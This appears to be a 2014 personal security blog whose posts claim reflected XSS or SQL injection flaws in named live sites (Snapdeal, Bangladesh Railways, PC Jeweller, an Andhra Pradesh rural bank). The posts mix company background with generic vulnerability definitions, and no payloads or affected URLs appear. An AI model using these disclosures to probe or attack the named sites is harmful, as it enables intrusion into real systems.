Thursday, July 3, 2014

Snapdeal is vulnerable to Xss(Reflected)

 Snapdeal.com is an online marketplace, headquartered in New DelhiIndia. The company was started by Kunal Bahl, a Whartongraduate as part of the dual degree M&T Engineering and Business program at Penn, and Rohit Bansal, an alumnus of IIT Delhi in February 2010.Snapdeal.com was started in February 2010 as a daily deals platform but expanded in September 2011 to become an e-commerce company via a marketplace model. With 20 million registered users, Snapdeal is one of the first and largest online marketplaces in India offering an assortment of 4 million+ products across diverse categories from over 20,000 sellers, shipping to 4,000 towns and cities in India.

Further on testing i found Xss vulnerability in m.snapdeal.com 

Affected Url:


















Saturday, May 10, 2014

Bangladesh Railways is vulnerable to XSS

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses, a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used by that site.



Tuesday, April 15, 2014

PC Jeweller is vulnerable to SQL injection

PC Jeweller started operations in April 2005 with one showroom at Karol Bagh Delhi. It is a first generation business promoted by two brothers- Sh Padam Chand Gupta and Sh Balram Garg. The company, however, had a vision of expanding its presence in the retail segment .

The company's business model consists of opening large format, stand alone stores at high street locations. It's stores stock a wide range of jewelry across all price points, with an increasing focus on diamond jewellery. The company sells only hallmarked jewelry and certified diamond jewelry. This assurance on quality & purity along with transparent & customer friendly policies has enabled PCJ to become an established and trusted brand name in a short time span.

It has accordingly been opening showrooms at regular intervals and today has a strength of 41 stores spread over 33 cities.

The most valued asset is our relationship with the clients, which has been built over years by giving certified quality, latest designs, transparency in dealings and best personalized customer service. Proactive and timely research and creation of world class jewelry and also guidance to its customers to enable them to take correct purchase decisions.

The company is confident that its trust on diamond and other high margin jewellery along with customer oriented marketing initiatives would continue to help grow its top line as well as the bottom line.

Mr. Padam Chand Gupta, Chairman of the Company has our three decades experience in jewelry.

Mr. Balram Garg, Managing Director of the Company can easily be called the goodwill ambassador of this group. A man of clear vision and strong decision, Mr. Garg's approach in business rests on his belief that nothing is impossible.


 Ok, Further on tesing i found a vulnerability of SQL injection in it.



Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

Monday, April 14, 2014

Andhra Pradesh Grameena Vikas Bank is vulnerable to SQL injection

APGVB Formation



 By amalgamation, on the 31st March 2006, of the following 5 banks, sponsored by SBI, to participate more energetically, with synergy, in the uplift and development of Rural Farm Sector and Rural Non-Farm Sector, with emphasis on the deprived, the Rural Poor, Rural ISB and Rural Crafts.

 Further on testing i found vulnerability in http://www.apgvbank.in 


Hope they will patch the vulnerability  as soon as possible.






Regards:Anshuman Kak